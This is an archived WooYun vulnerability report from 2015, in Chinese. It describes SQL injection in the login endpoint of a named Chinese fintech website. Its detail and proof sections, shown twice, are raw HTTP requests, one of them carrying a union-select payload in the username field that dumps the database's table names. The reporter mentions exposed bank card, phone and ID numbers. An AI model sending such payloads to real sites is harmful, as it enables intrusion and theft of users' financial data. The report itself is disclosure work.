当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138529

漏洞标题:点点盈网站登录信息过滤不严导致SQL注入

相关厂商:ddy98.com

漏洞作者: 路人甲

提交时间:2015-09-29 10:24

修复时间:2015-10-12 19:26

公开时间:2015-10-12 19:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

点点盈互联网金融服务(杭州)有限公司,是杭州科地资本集团有限公司旗下的互联网金融服务公司,开发、经营、管理点点盈【www.ddy98.com】互联网金融综合平台,公司高级管理团队及顾问由陈刚、黄晓捷、陈宇等资深的金融行业和互联网行业的专家组成。
作为专业的互联网金融平台,点点盈将以互联网券商为主要发展方向,致力于为公众提供包括互联网券商经纪业务、标准化金融产品互联网销售等互联网金融业务,结合多年的资产管理服务和风险控制经验,利用先进的信息处理技术,不断为投资者提供更安全、更丰富、更便捷的互联网金融产品。
跟毛爷爷有关的事情不会不管吧。。

详细说明:

POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 84
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441160243; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441160341
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=15656565656&passwd=vfdsbfds&ytoken=796bac1af7ed162b7c3df6ea8c8cc34060646203


username存在注入

POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 286
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441154494; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441154686
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=1 union select exp(~(select*from(select group_concat(distinct table_name) from (select * from information_schema.columns group by table_name having table_schema=database() limit 1,40)a)x)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1#&passwd=ss&ytoken=8dc819e1e284f808185e2f3abc78d23c286b4b42


屏幕截图(34).png


屏幕截图(35).png


屏幕截图(36).png


好像还有各种银行卡账号、用户手机号、身份证号。。没细看,就这样吧

漏洞证明:

POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 84
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441160243; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441160341
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=15656565656&passwd=vfdsbfds&ytoken=796bac1af7ed162b7c3df6ea8c8cc34060646203


username存在注入

POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 286
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441154494; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441154686
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=1 union select exp(~(select*from(select group_concat(distinct table_name) from (select * from information_schema.columns group by table_name having table_schema=database() limit 1,40)a)x)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1#&passwd=ss&ytoken=8dc819e1e284f808185e2f3abc78d23c286b4b42


屏幕截图(34).png


屏幕截图(35).png


屏幕截图(36).png


好像还有各种银行卡账号、用户手机号、身份证号。。没细看,就这样吧

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 19:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-10-13:此版本早已更新,目前已无上述漏洞,不过还是感谢提醒。请乌云网核实后关闭此信息